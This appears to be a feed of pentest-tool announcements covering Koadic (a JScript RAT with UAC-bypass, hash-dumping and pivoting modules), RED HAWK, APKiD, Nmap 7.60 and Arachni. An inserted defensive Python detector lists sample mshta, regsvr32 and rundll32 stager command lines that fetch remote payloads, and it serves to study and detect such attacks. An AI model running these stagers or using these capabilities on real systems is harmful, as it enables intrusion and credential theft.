Koadic – COM Command & Control Framework (JScript RAT)

Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript), with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.

It is possible to serve payloads completely in memory from stage 0 to beyond, as well as use cryptographically secure communications over SSL and TLS (depending on what the victim OS has enabled).

Koadic also attempts to be compatible with both Python 2 and Python 3.

Demo
- Hooks a zombie
- Elevates integrity (UAC Bypass)
- Dumps SAM/SECURITY hive for passwords
- Scans local network for open SMB
- Pivots to another machine

Stagers
Stagers hook target zombies and allow you to use implants.

Module                 Description
stager/js/mshta        serves payloads in memory using MSHTA.exe HTML Applications
stager/js/regsvr       serves payloads in memory using regsvr32.exe COM+ scriptlets
stager/js/rundll32_js  serves payloads in memory using rundll32.exe
stager/js/disk         serves payloads using files on disk

Implants
Implants start jobs on zombies.

Module                              Description
implant/elevate/bypassuac_eventvwr  Uses enigma0x3’s eventvwr.exe exploit to bypass UAC on Windows 7, 8, and 10.
implant/elevate/bypassuac_sdclt     Uses enigma0x3’s sdclt.exe exploit to bypass UAC on Windows 10.
implant/fun/zombie                  Maxes volume and opens The Cranberries YouTube in a hidden window.
implant/fun/voice                   Plays a message over text-to-speech.
implant/gather/clipboard            Retrieves the current content of the user clipboard.
implant/gather/hashdump_sam         Retrieves hashed passwords from the SAM hive.
implant/gather/hashdump_dc          Domain controller hashes from the NTDS.dit file.
implant/inject/mimikatz_dynwrapx    Injects a reflective-loaded DLL to run powerkatz.dll (using Dynamic Wrapper X).
implant/inject/mimikatz_dotnet2js   Injects a reflective-loaded DLL to run powerkatz.dll (@tiraniddo DotNetToJS).
implant/inject/shellcode_excel      Runs arbitrary shellcode payload (if Excel is installed).
implant/manage/enable_rdesktop      Enables remote desktop on the target.
implant/manage/exec_cmd             Run an arbitrary command on the target, and optionally receive the output.
implant/pivot/stage_wmi             Hook a zombie on another machine using WMI.
implant/pivot/exec_psexec           Run a command on another machine using psexec from sysinternals.
implant/scan/tcp                    Uses HTTP to scan open TCP ports on the target zombie LAN.
implant/utils/download_file         Downloads a file from the target zombie.
implant/utils/upload_file           Uploads a file from the listening server to the target zombies.

Disclaimer
Code samples are provided for educational purposes. Adequate defenses can only be built by researching attack techniques available to malicious actors. Using this code against target systems without prior permission is illegal in most jurisdictions. The authors are not liable for any damages from misuse of this information or code.

Creators
@Aleph___Naught, @The_Naterz, @JennaMagius, @zerosum0x0

Contributors
@vvalien1, fbctf, cclaus, Arno0x, delirious-lettuce

Acknowledgements
Special thanks to research done by the following individuals: @subTee, @enigma0x3, @tiraniddo, @harmj0y, @gentilkiwi, @mattifestation, clymb3r

Download Koadic
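A defender-side check tied to the three in-memory stagers in the table above (mshta.exe, regsvr32.exe, rundll32.exe). This is an added example, not code from Koadic or its documentation: it flags process-creation records in which one of those script hosts is handed a remote URL, an inline javascript:/vbscript: argument, or a COM+ scriptlet; the sample records are constructed, and the scrobj.dll pattern is an assumption about how regsvr32 scriptlets are typically loaded rather than something the table states.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Script hosts used by the three in-memory stagers in the Koadic table.
SCRIPT_HOSTS = {"mshta.exe", "regsvr32.exe", "rundll32.exe"}

# Generic indicators that the host is being fed content rather than a local
# binary: a remote URL, an inline script scheme, or (assumed typical loader
# for COM+ scriptlets) regsvr32's /i: switch together with scrobj.dll.
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
INLINE_SCRIPT = re.compile(r"\b(?:javascript|vbscript):", re.IGNORECASE)
SCRIPTLET_LOAD = re.compile(r"/i:\S+.*\bscrobj\.dll\b", re.IGNORECASE)


@dataclass
class Finding:
    image: str
    command_line: str
    reason: str


def _basename(path: str) -> str:
    """Last path component, lower-cased, tolerating either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(image: str, command_line: str) -> Optional[str]:
    """Return a reason if this process creation looks like a script-host
    stager, or None if the host is absent or invoked with a local target."""
    if _basename(image) not in SCRIPT_HOSTS:
        return None
    if INLINE_SCRIPT.search(command_line):
        return "inline script scheme passed to script host"
    if SCRIPTLET_LOAD.search(command_line):
        return "regsvr32 loading a COM+ scriptlet via scrobj.dll"
    if REMOTE_URL.search(command_line):
        return "script host fetching its payload from a remote URL"
    return None


def scan(events: List[Tuple[str, str]]) -> List[Finding]:
    """Run classify() over (image, command_line) records and keep the hits."""
    findings = []
    for image, command_line in events:
        reason = classify(image, command_line)
        if reason:
            findings.append(Finding(image, command_line, reason))
    return findings


# Constructed sample process-creation records, not real telemetry.
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\mshta.exe",
     "mshta.exe http://198.51.100.7:9999/stager"),
    ("C:\\Windows\\System32\\regsvr32.exe",
     "regsvr32.exe /s /n /u /i:http://198.51.100.7/sct scrobj.dll"),
    ("C:\\Windows\\System32\\rundll32.exe",
     "rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write()"),
    ("C:\\Windows\\System32\\regsvr32.exe",
     "regsvr32.exe /s C:\\Program Files\\Vendor\\plugin.dll"),
    ("C:\\Windows\\System32\\rundll32.exe",
     "rundll32.exe shell32.dll,Control_RunDLL"),
    ("C:\\Windows\\System32\\mshta.exe",
     "mshta.exe C:\\Program Files\\Vendor\\setup.hta"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{_basename(f.image)}: {f.reason}\n    {f.command_line}")
```

The last three records are the benign baseline (local DLL, control-panel applet, local HTA) and are not flagged, which is the distinction a rule on these hosts must make to stay usable.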

Link: http://feedproxy.google.com/~r/PentestTools/~3/4r9r5eiQR9E/koadic-com-command-control-framework.html

RED HAWK v2.0.0 – All in one tool for Information Gathering, Vulnerability Scanning and Crawling. A must have tool for all penetration testers

RED HAWK is an all-in-one tool for information gathering, SQL vulnerability scanning and crawling. Coded in PHP.

Features:
- Basic Scan
  - Site Title (NEW)
  - IP Address
  - Web Server Detection (IMPROVED)
  - CMS Detection
  - Cloudflare Detection
  - robots.txt Scanner
- Whois Lookup (IMPROVED)
- Geo-IP Lookup
- Grab Banners (IMPROVED)
- DNS Lookup
- Subnet Calculator
- Nmap Port Scan
- Sub-Domain Scanner (IMPROVED)
  - Sub Domain
  - IP Address
- Reverse IP Lookup & CMS Detection (IMPROVED)
  - Hostname
  - IP Address
  - CMS
- Error Based SQLi Scanner
- Bloggers View (NEW)
  - HTTP Response Code
  - Site Title
  - Alexa Ranking
  - Domain Authority
  - Page Authority
  - Social Links Extractor
  - Link Grabber
- WordPress Scan (NEW)
  - Sensitive Files Crawling
  - Version Detection
  - Version Vulnerability Scanner
- Crawler
- MX Lookup (NEW)
- Scan For Everything – The Old Lame Scanner

Released Versions:
- Version 1.0.0 [11-06-2017]
- Version 1.1.0 [15-06-2017]
- Version 2.0.0 [11-08-2017]

Changelog:
Version 1.0.0
- Initial Launch
Version 1.1.0
- Updated the fix command
Version 2.0.0
- Separated all scans so that you are served the amount of information you need
- Sub-Domain Scanner improved
- fix command improved
- Web Server Detection improved
- CMS Detection improved
- Banner Grabbing improved
- Added WordPress Scanner
- Added Bloggers View
- Added MX Lookup
- Added Update option
- RED HAWK banner updated
- Many other internal fixes

Installation:
Run the tool and type fix. This will install all required modules.
For the Bloggers View to work properly you have to configure RED HAWK with moz.com’s API keys; to do that, follow these steps:

How To Configure RED HAWK with moz.com for Bloggers View Scan
- Create an account in moz; follow this link: https://moz.com/community/join
- After successful account creation and completing the verification you need to generate the API keys.
- You can get your API keys here: https://moz.com/products/mozscape/access
- Get your AccessID and SecretKey and replace the values of the $accessID and $secretKey variables in the config.php file.
- All set, now you can enjoy the Bloggers View.

Usage:
git clone https://github.com/Tuhinshubhra/RED_HAWK
cd RED_HAWK
php rhawk.php

- Use the "help" command to see the command list or type in the domain name you want to scan (without http:// or https://).
- Select whether the site runs on HTTPS or not.
- Select the type of scan you want to perform.
- Leave the rest to the scanner.

List of CMS Supported
RED HAWK’s CMS Detector currently is able to detect the following CMSs (Content Management Systems); in case the website is using some other CMS, the detector will return "could not detect".
- WordPress
- Joomla
- Drupal
- Magento

Video Demonstration

TODOs
- Make a proper update option (installs current version automatically)
- Add more CMS to the detector
- Improve the WordPress Scanner (add user, theme & plugin enumeration)
- Create a web version of the scanner
- Add XSS & LFI Scanner
- Improve the links grabber thingy under Bloggers View
- Add some other scans under the Bloggers View

Download RED HAWK

Link: http://feedproxy.google.com/~r/PentestTools/~3/Bh6V5k5W1qg/red-hawk-v200-all-in-one-tool-for.html

APKiD – Android Application Identifier for Packers, Protectors, Obfuscators and Oddities

APKiD gives you information about how an APK was made. It identifies many compilers, packers, obfuscators, and other weird stuff. It’s PEiD for Android.

For more information on what this tool can be used for, check out:
- Android Compiler Fingerprinting
- Detecting Pirated and Malicious Android Apps with APKiD

Installing
The yara-python clone and compile steps here are temporarily necessary because we must point directly to our modified version of a Yara branch which includes our DEX Yara module. This step is necessary until (if?) the original maintainers of Yara merge our module into the master branch. When this happens, we will update the instructions here. After the yara-python fork is compiled, you can use pip to install the most recently published APKiD package.

git clone https://github.com/rednaga/yara-python
cd yara-python
python setup.py install
pip install apkid

Usage
usage: apkid [-h] [-j] [-t TIMEOUT] [-o DIR] [FILE [FILE ...]]

APKiD - Android Application Identifier v1.0.0

positional arguments:
  FILE                  apk, dex, or directory

optional arguments:
  -h, --help            show this help message and exit
  -j, --json            output results in JSON format
  -t TIMEOUT, --timeout TIMEOUT
                        Yara scan timeout (in seconds)
  -o DIR, --output-dir DIR
                        write individual JSON results to this directory

Submitting New Packers / Compilers / Obfuscators
If you come across an APK or DEX which APKiD does not recognize, please open a GitHub issue and tell us:
- what you think it is
- the file hash (either MD5, SHA1, SHA256)

We are open to any type of concept you might have for "something interesting" to detect, so do not limit yourself solely to packers, compilers or obfuscators. If there is an interesting anti disassembler, anti vm, anti* trick, please make an issue.

You’re also welcome to submit pull requests. Just be sure to include a file hash so we can check the rule.

Hacking
First you will need to install the specific version of yara-python the project depends on (more information about this in the Installing section):

git clone https://github.com/rednaga/yara-python
cd yara-python
python setup.py install

Then, clone this repo, compile the rules, and install the package in editable mode:

git clone https://github.com/rednaga/APKiD
cd APKiD
./prep-release.py
pip install -e .[dev]

If the above doesn’t work, due to permission errors dependent on your local machine and where Python has been installed, try specifying the --user flag. This is likely needed if you are working on OSX:

pip install -e .[dev] --user

Download APKiD

Link: http://feedproxy.google.com/~r/PentestTools/~3/NC8uYVseoHI/apkid-android-application-identifier.html

Nmap 7.60 – Free Security Scanner For Network Exploration & Security Audits

Nmap (“Network Mapper”) is a free and open source utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping).

Nmap was named “Security Product of the Year” by Linux Journal, Info World, LinuxQuestions.Org, and Codetalker Digest. It was even featured in twelve movies, including The Matrix Reloaded, Die Hard 4, Girl With the Dragon Tattoo, and The Bourne Ultimatum.

Features
- Flexible: Supports dozens of advanced techniques for mapping out networks filled with IP filters, firewalls, routers, and other obstacles. This includes many port scanning mechanisms (both TCP & UDP), OS detection, version detection, ping sweeps, and more. See the documentation page.
- Powerful: Nmap has been used to scan huge networks of literally hundreds of thousands of machines.
- Portable: Most operating systems are supported, including Linux, Microsoft Windows, FreeBSD, OpenBSD, Solaris, IRIX, Mac OS X, HP-UX, NetBSD, Sun OS, Amiga, and more.
- Easy: While Nmap offers a rich set of advanced features for power users, you can start out as simply as "nmap -v -A targethost". Both traditional command line and graphical (GUI) versions are available to suit your preference. Binaries are available for those who do not wish to compile Nmap from source.
- Free: The primary goals of the Nmap Project are to help make the Internet a little more secure and to provide administrators/auditors/hackers with an advanced tool for exploring their networks. Nmap is available for free download, and also comes with full source code that you may modify and redistribute under the terms of the license.
- Well Documented: Significant effort has been put into comprehensive and up-to-date man pages, whitepapers, tutorials, and even a whole book! Find them in multiple languages here.
- Supported: While Nmap comes with no warranty, it is well supported by a vibrant community of developers and users. Most of this interaction occurs on the Nmap mailing lists. Most bug reports and questions should be sent to the nmap-dev list, but only after you read the guidelines. We recommend that all users subscribe to the low-traffic nmap-hackers announcement list. You can also find Nmap on Facebook and Twitter. For real-time chat, join the #nmap channel on Freenode or EFNet.
- Acclaimed: Nmap has won numerous awards, including "Information Security Product of the Year" by Linux Journal, Info World and Codetalker Digest. It has been featured in hundreds of magazine articles, several movies, dozens of books, and one comic book series. Visit the press page for further details.
- Popular: Thousands of people download Nmap every day, and it is included with many operating systems (Redhat Linux, Debian Linux, Gentoo, FreeBSD, OpenBSD, etc). It is among the top ten (out of 30,000) programs at the Freshmeat.Net repository. This is important because it lends Nmap its vibrant development and user support communities.

Changelog
• [Windows] Updated the bundled Npcap from 0.91 to 0.93, fixing several issues with installation and compatibility with the Windows 10 Creators Update.
• [NSE][GH#910] NSE scripts now have complete SSH support via libssh2, including password brute-forcing and running remote commands, thanks to the combined efforts of three Summer of Code students: [Devin Bjelland, Sergey Khegay, Evangelos Deirmentzoglou]
• [NSE] Added 14 NSE scripts from 6 authors, bringing the total up to 579! They are all listed at https://nmap.org/nsedoc/, and the summaries are below:
  – ftp-syst sends SYST and STAT commands to FTP servers to get system version and connection information. [Daniel Miller]
  – [GH#916] http-vuln-cve2017-8917 checks for an SQL injection vulnerability affecting Joomla! 3.7.x before 3.7.1. [Wong Wai Tuck]
  – iec-identify probes for the IEC 60870-5-104 SCADA protocol. [Aleksandr Timorin, Daniel Miller]
  – [GH#915] openwebnet-discovery retrieves device identifying information and number of connected devices running on openwebnet protocol. [Rewanth Cool]
  – puppet-naivesigning checks for a misconfiguration in the Puppet CA where naive signing is enabled, allowing for any CSR to be automatically signed. [Wong Wai Tuck]
  – [GH#943] smb-protocols discovers if a server supports dialects NT LM 0.12 (SMBv1), 2.02, 2.10, 3.00, 3.02 and 3.11. This replaces the old smbv2-enabled script. [Paulino Calderon]
  – [GH#943] smb2-capabilities lists the supported capabilities of SMB2/SMB3 servers. [Paulino Calderon]
  – [GH#943] smb2-time determines the current date and boot date of SMB2 servers. [Paulino Calderon]
  – [GH#943] smb2-security-mode determines the message signing configuration of SMB2/SMB3 servers. [Paulino Calderon]
  – [GH#943] smb2-vuln-uptime attempts to discover missing critical patches in Microsoft Windows systems based on the SMB2 server uptime. [Paulino Calderon]
  – ssh-auth-methods lists the authentication methods offered by an SSH server. [Devin Bjelland]
  – ssh-brute performs brute-forcing of SSH password credentials. [Devin Bjelland]
  – ssh-publickey-acceptance checks public or private keys to see if they could be used to log in to a target. A list of known-compromised key pairs is included and checked by default. [Devin Bjelland]
  – ssh-run uses user-provided credentials to run commands on targets via SSH. [Devin Bjelland]
• [NSE] Removed smbv2-enabled, which was incompatible with the new SMBv2/3 improvements. It was fully replaced by the smb-protocols script.
• [Ncat][GH#446] Added Datagram TLS (DTLS) support to Ncat in connect (client) mode with --udp --ssl. Also added Application Layer Protocol Negotiation (ALPN) support with the --ssl-alpn option. [Denis Andzakovic, Daniel Miller]
• Updated the default ciphers list for Ncat and the secure ciphers list for Nsock to use "!aNULL:!eNULL" instead of "!ADH". With the addition of ECDH ciphersuites, anonymous ECDH suites were being allowed. [Daniel Miller]
• [NSE][GH#930] Fix ndmp-version and ndmp-fs-info when scanning Veritas Backup Exec Agent 15 or 16. [Andrew Orr]
• [NSE][GH#943] Added new SMB2/3 library and related scripts. [Paulino Calderon]
• [NSE][GH#950] Added wildcard detection to dns-brute. Only hostnames that resolve to unique addresses will be listed. [Aaron Heesakkers]
• [NSE] FTP scripts like ftp-anon and ftp-brute now correctly handle TLS-protected FTP services and use STARTTLS when necessary. [Daniel Miller]
• [NSE][GH#936] Function url.escape no longer encodes so-called "unreserved" characters, including hyphen, period, underscore, and tilde, as per RFC 3986. [nnposter]
• [NSE][GH#935] Function http.pipeline_go no longer assumes that persistent connections are supported on HTTP 1.0 targets (unless the target explicitly declares otherwise), as per RFC 7230. [nnposter]
• [NSE][GH#934] The HTTP response object has a new member, version, which contains the HTTP protocol version string returned by the server, e.g. "1.0". [nnposter]
• [NSE][GH#938] Fix handling of the objectSID Active Directory attribute by ldap.lua. [Tom Sellers]
• [NSE] Fix line endings in the list of Oracle SIDs used by oracle-sid-brute. Carriage Return characters were being sent in the connection packets, likely resulting in failure of the script. [Anant Shrivastava]
• [NSE][GH#141] http-useragent-checker now checks for changes in HTTP status (usually 403 Forbidden) in addition to redirects to indicate forbidden User Agents. [Gyanendra Mishra]

Download Nmap 7.60

Link: http://feedproxy.google.com/~r/PentestTools/~3/6A-OnRPPMdg/nmap-760-free-security-scanner-for.html

Arachni v1.5.1 – Web Application Security Scanner Framework

Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.

It is smart: it trains itself by monitoring and learning from the web application’s behavior during the scan process and is able to perform meta-analysis using a number of factors in order to correctly assess the trustworthiness of results and intelligently identify (or avoid) false-positives.

Unlike other scanners, it takes into account the dynamic nature of web applications, can detect changes caused while travelling through the paths of a web application’s cyclomatic complexity and is able to adjust itself accordingly. This way, attack/input vectors that would otherwise be undetectable by non-humans can be handled seamlessly.

Moreover, due to its integrated browser environment, it can also audit and inspect client-side code, as well as support highly complicated web applications which make heavy use of technologies such as JavaScript, HTML5, DOM manipulation and AJAX.

Finally, it is versatile enough to cover a great deal of use cases, ranging from a simple command line scanner utility, to a global high performance grid of scanners, to a Ruby library allowing for scripted audits, to a multi-user multi-scan web collaboration platform.

Note: Despite the fact that Arachni is mostly targeted towards web application security, it can easily be used for general purpose scraping, data-mining, etc. with the addition of custom components.

Arachni offers:

A stable, efficient, high-performance framework
Check, report and plugin developers are allowed to easily and quickly create and deploy their components with the minimum amount of restrictions imposed upon them, while provided with the necessary infrastructure to accomplish their goals.
Furthermore, they are encouraged to take full advantage of the Ruby language under a unified framework that will increase their productivity without stifling them or complicating their tasks.
Moreover, that same framework can be utilized as any other Ruby library and lead to the development of brand new scanners or help you create highly customized scan/audit scenarios and/or scripted scans.

Simplicity
Although some parts of the Framework are fairly complex you will never have to deal with them directly. From a user’s or a component developer’s point of view everything appears simple and straight-forward all the while providing power, performance and flexibility.
From the simple command-line utility scanner to the intuitive and user-friendly Web interface and collaboration platform, Arachni follows the principle of least surprise and provides you with plenty of feedback and guidance.

In simple terms
Arachni is designed to automatically detect security issues in web applications. All it expects is the URL of the target website and after a while it will present you with its findings.

Features

General
- Cookie-jar/cookie-string support.
- Custom header support.
- SSL support with fine-grained options.
- User Agent spoofing.
- Proxy support for SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1 and HTTP/1.0.
- Proxy authentication.
- Site authentication (SSL-based, form-based, Cookie-Jar, Basic-Digest, NTLMv1, Kerberos and others).
- Automatic log-out detection and re-login during the scan (when the initial login was performed via the autologin, login_script or proxy plugins).
- Custom 404 page detection.
- UI abstraction:
  - Command-line Interface.
  - Web User Interface.
- Pause/resume functionality.
- Hibernation support — Suspend to and restore from disk.
- High performance asynchronous HTTP requests.
  - With adjustable concurrency.
  - With the ability to auto-detect server health and adjust its concurrency automatically.
- Support for custom default input values, using pairs of patterns (to be matched against input names) and values to be used to fill in matching inputs.

Integrated browser environment
Arachni includes an integrated, real browser environment in order to provide sufficient coverage to modern web applications which make use of technologies such as HTML5, JavaScript, DOM manipulation, AJAX, etc.
In addition to the monitoring of the vanilla DOM and JavaScript environments, Arachni’s browsers also hook into popular frameworks to make the logged data easier to digest:
- JQuery
- AngularJS
- More to come...
In essence, this turns Arachni into a DOM and JavaScript debugger, allowing it to monitor DOM events and JavaScript data and execution flows. As a result, not only can the system trigger and identify DOM-based issues, but it will accompany them with a great deal of information regarding the state of the page at the time.
Relevant information includes:
- Page DOM, as HTML code.
  - With a list of DOM transitions required to restore the state of the page to the one at the time it was logged.
- Original DOM (i.e. prior to the action that caused the page to be logged), as HTML code.
  - With a list of DOM transitions.
- Data-flow sinks — Each sink is a JS method which received a tainted argument.
  - Parent object of the method (ex.: DOMWindow).
  - Method signature (ex.: decodeURIComponent()).
  - Arguments list.
    - With the identified taint located recursively in the included objects.
  - Method source code.
  - JS stacktrace.
- Execution flow sinks — Each sink is a successfully executed JS payload, as injected by the security checks.
  - Includes a JS stacktrace.
- JavaScript stack-traces include:
  - Method names.
  - Method locations.
  - Method source codes.
  - Argument lists.
In essence, you have access to roughly the same information that your favorite debugger (for example, FireBug) would provide, as if you had set a breakpoint to take place at the right time for identifying an issue.

Browser-cluster
The browser-cluster is what coordinates the browser analysis of resources and allows the system to perform operations which would normally be quite time consuming in a high-performance fashion.
Configuration options include:
- Adjustable pool-size, i.e. the amount of browser workers to utilize.
- Timeout for each job.
- Worker TTL counted in jobs — Workers which exceed the TTL have their browser process respawned.
- Ability to disable loading images.
- Adjustable screen width and height.
  - Can be used to analyze responsive and mobile applications.
- Ability to wait until certain elements appear in the page.
- Configurable local storage data.

Coverage
The system can provide great coverage to modern web applications due to its integrated browser environment. This allows it to interact with complex applications that make heavy use of client-side code (like JavaScript) just like a human would.
In addition to that, it also knows about which browser state changes the application has been programmed to handle and is able to trigger them programmatically in order to provide coverage for a full set of possible scenarios.
By inspecting all possible pages and their states (when using client-side code) Arachni is able to extract and audit the following elements and their inputs:
- Forms
  - Along with ones that require interaction via a real browser due to DOM events.
- User-interface Forms
  - Input and button groups which don’t belong to an HTML <form> element but are instead associated via JS code.
- User-interface Inputs
  - Orphan <input> elements with associated DOM events.
- Links
  - Along with ones that have client-side parameters in their fragment, i.e.: http://example.com/#/?param=val&param2=val2
  - With support for rewrite rules.
- LinkTemplates — Allowing for extraction of arbitrary inputs from generic paths, based on user-supplied templates — useful when rewrite rules are not available.
  - Along with ones that have client-side parameters in their URL fragments, i.e.: http://example.com/#/param/val/param2/val2
- Cookies
- Headers
- Generic client-side elements which have associated DOM events.
- AJAX-request parameters.
- JSON request data.
- XML request data.

Open distributed architecture
Arachni is designed to fit into your workflow and easily integrate with your existing infrastructure.
Depending on the level of control you require over the process, you can either choose the REST service or the custom RPC protocol.
Both approaches allow you to:
- Remotely monitor and manage scans.
- Perform multiple scans at the same time — Each scan is compartmentalized to its own OS process to take advantage of:
  - Multi-core/SMP architectures.
  - OS-level scheduling/restrictions.
  - Sandboxed failure propagation.
- Communicate over a secure channel.

REST API
- Very simple and straightforward API.
- Easy interoperability with non-Ruby systems.
- Operates over HTTP.
- Uses JSON to format messages.
- Stateful scan monitoring.
  - Unique sessions automatically only receive updates when polling for progress, rather than full data.

RPC API
- High-performance/low-bandwidth communication protocol.
- MessagePack serialization for performance, efficiency and ease of integration with 3rd party systems.
- Grid:
  - Self-healing.
  - Scale up/down by hot-plugging/hot-unplugging nodes.
    - Can scale up infinitely by adding nodes to increase scan capacity.
  - (Always-on) Load-balancing — All Instances are automatically provided by the least burdened Grid member.
    - With optional per-scan opt-out/override.
  - (Optional) High-Performance mode — Combines the resources of multiple nodes to perform multi-Instance scans.
    - Enabled on a per-scan basis.

Scope configuration
- Filters for redundant pages like galleries, catalogs, etc. based on regular expressions and counters.
  - Can optionally detect and ignore redundant pages automatically.
- URL exclusion filters using regular expressions.
- Page exclusion filters based on content, using regular expressions.
- URL inclusion filters using regular expressions.
- Can be forced to only follow HTTPS paths and not downgrade to HTTP.
- Can optionally follow subdomains.
- Adjustable page count limit.
- Adjustable redirect limit.
- Adjustable directory depth limit.
- Adjustable DOM depth limit.
- Adjustment using URL-rewrite rules.
- Can read paths from multiple user supplied files (to both restrict and extend the scope).

Audit
- Can audit:
  - Forms
    - Can automatically refresh nonce tokens.
    - Can submit them via the integrated browser environment.
  - User-interface Forms
    - Input and button groups which don’t belong to an HTML <form> element but are instead associated via JS code.
  - User-interface Inputs
    - Orphan <input> elements with associated DOM events.
  - Links
    - Can load them via the integrated browser environment.
  - LinkTemplates
    - Can load them via the integrated browser environment.
  - Cookies
    - Can load them via the integrated browser environment.
  - Headers
  - Generic client-side DOM elements.
  - JSON request data.
  - XML request data.
- Can ignore binary/non-text pages.
- Can audit elements using both GET and POST HTTP methods.
- Can inject both raw and HTTP encoded payloads.
- Can submit all links and forms of the page along with the cookie permutations to provide extensive cookie-audit coverage.
- Can exclude specific input vectors by name.
- Can include specific input vectors by name.

Components
Arachni is a highly modular system, employing several components of distinct types to perform its duties.
In addition to enabling or disabling the bundled components so as to adjust the system’s behavior and features as needed, functionality can be extended via the addition of user-created components to suit almost every need.

Platform fingerprinters
In order to make efficient use of the available bandwidth, Arachni performs rudimentary platform fingerprinting and tailors the audit process to the server-side deployed technologies by only using applicable payloads.
Currently, the following platforms can be identified:
- Operating systems
  - BSD
  - Linux
  - Unix
  - Windows
  - Solaris
- Web servers
  - Apache
  - IIS
  - Nginx
  - Tomcat
  - Jetty
  - Gunicorn
- Programming languages
  - PHP
  - ASP
  - ASPX
  - Java
  - Python
  - Ruby
- Frameworks
  - Rack
  - CakePHP
  - Rails
  - Django
  - ASP.NET MVC
  - JSF
  - CherryPy
  - Nette
  - Symfony
The user also has the option of specifying extra platforms (like a DB server) in order to help the system be as efficient as possible. Alternatively, fingerprinting can be disabled altogether.
Finally, Arachni will always err on the side of caution and send all available payloads when it fails to identify specific platforms.

Checks
Checks are system components which perform security checks and log issues.

Active
Active checks engage the web application via its inputs.
- SQL injection (sql_injection) — Error based detection.
  - Oracle
  - InterBase
  - PostgreSQL
  - MySQL
  - MSSQL
  - EMC
  - SQLite
  - DB2
  - Informix
  - Firebird
  - SaP Max DB
  - Sybase
  - Frontbase
  - Ingres
  - HSQLDB
  - MS Access
- Blind SQL injection using differential analysis (sql_injection_differential).
- Blind SQL injection using timing attacks (sql_injection_timing).
  - MySQL
  - PostgreSQL
  - MSSQL
- NoSQL injection (no_sql_injection) — Error based vulnerability detection.
  - MongoDB
- Blind NoSQL injection using differential analysis (no_sql_injection_differential).
- CSRF detection (csrf).
- Code injection (code_injection).
  - PHP
  - Ruby
  - Python
  - Java
  - ASP
- Blind code injection using timing attacks (code_injection_timing).
  - PHP
  - Ruby
  - Python
  - Java
  - ASP
- LDAP injection (ldap_injection).
- Path traversal (path_traversal).
  - *nix
  - Windows
  - Java
- File inclusion (file_inclusion).
  - *nix
  - Windows
  - Java
  - PHP
  - Perl
- Response splitting (response_splitting).
- OS command injection (os_cmd_injection).
  - *nix
  - *BSD
  - IBM AIX
  - Windows
- Blind OS command injection using timing attacks (os_cmd_injection_timing).
  - Linux
  - *BSD
  - Solaris
  - Windows
- Remote file inclusion (rfi).
- Unvalidated redirects (unvalidated_redirect).
- Unvalidated DOM redirects (unvalidated_redirect_dom).
- XPath injection (xpath_injection).
  - Generic
  - PHP
  - Java
  - dotNET
  - libXML2
- XSS (xss).
- Path XSS (xss_path).
- XSS in event attributes of HTML elements (xss_event).
- XSS in HTML tags (xss_tag).
- XSS in script context (xss_script_context).
- DOM XSS (xss_dom).
- DOM XSS script context (xss_dom_script_context).
- Source code disclosure (source_code_disclosure).
- XML External Entity (xxe).
  - Linux
  - *BSD
  - Solaris
  - Windows

Passive
Passive checks look for the existence of files, folders and signatures.
- Allowed HTTP methods (allowed_methods).
- Back-up files (backup_files).
- Backup directories (backup_directories).
- Common administration interfaces (common_admin_interfaces).
- Common directories (common_directories).
- Common files (common_files).
- HTTP PUT (http_put).
- Insufficient Transport Layer Protection for password forms (unencrypted_password_form).
- WebDAV detection (webdav).
- HTTP TRACE detection (xst).
- Credit Card number disclosure (credit_card).
- CVS/SVN user disclosure (cvs_svn_users).
- Private IP address disclosure (private_ip).
- Common backdoors (backdoors).
- .htaccess LIMIT misconfiguration (htaccess_limit).
- Interesting responses (interesting_responses).
- HTML object grepper (html_objects).
- E-mail address disclosure (emails).
- US Social Security Number disclosure (ssn).
- Forceful directory listing (directory_listing).
- Mixed Resource/Scripting (mixed_resource).
- Insecure cookies (insecure_cookies).
- HttpOnly cookies (http_only_cookies).
- Auto-complete for password form fields (password_autocomplete).
- Origin Spoof Access Restriction Bypass (origin_spoof_access_restriction_bypass).
- Form-based upload (form_upload).
- localstart.asp (localstart_asp).
- Cookie set for parent domain (cookie_set_for_parent_domain).
- Missing Strict-Transport-Security headers for HTTPS sites (hsts).
- Missing X-Frame-Options headers (x_frame_options).
- Insecure CORS policy (insecure_cors_policy).
- Insecure cross-domain policy (allow-access-from) (insecure_cross_domain_policy_access).
- Insecure cross-domain policy (allow-http-request-headers-from) (insecure_cross_domain_policy_headers).
- Insecure client-access policy (insecure_client_access_policy).

Reporters
- Standard output
- HTML (zip) (html).
- XML (xml).
- Text (text).
- JSON (json).
- Marshal (marshal).
- YAML (yaml).
- AFR (afr).
  - The default Arachni Framework Report format.

Plugins
Plugins add extra functionality to the system in a modular fashion; this way the core remains lean and makes it easy for anyone to add arbitrary functionality.
- Passive Proxy (proxy) — Analyzes requests and responses between the web app and the browser assisting in AJAX audits, logging-in and/or restricting the scope of the audit.
- Form based login (autologin).
- Script based login (login_script).
- Dictionary attacker for HTTP Auth (http_dicattack).
- Dictionary attacker for form based authentication (form_dicattack).
- Cookie collector (cookie_collector) — Keeps track of cookies while establishing a timeline of changes.
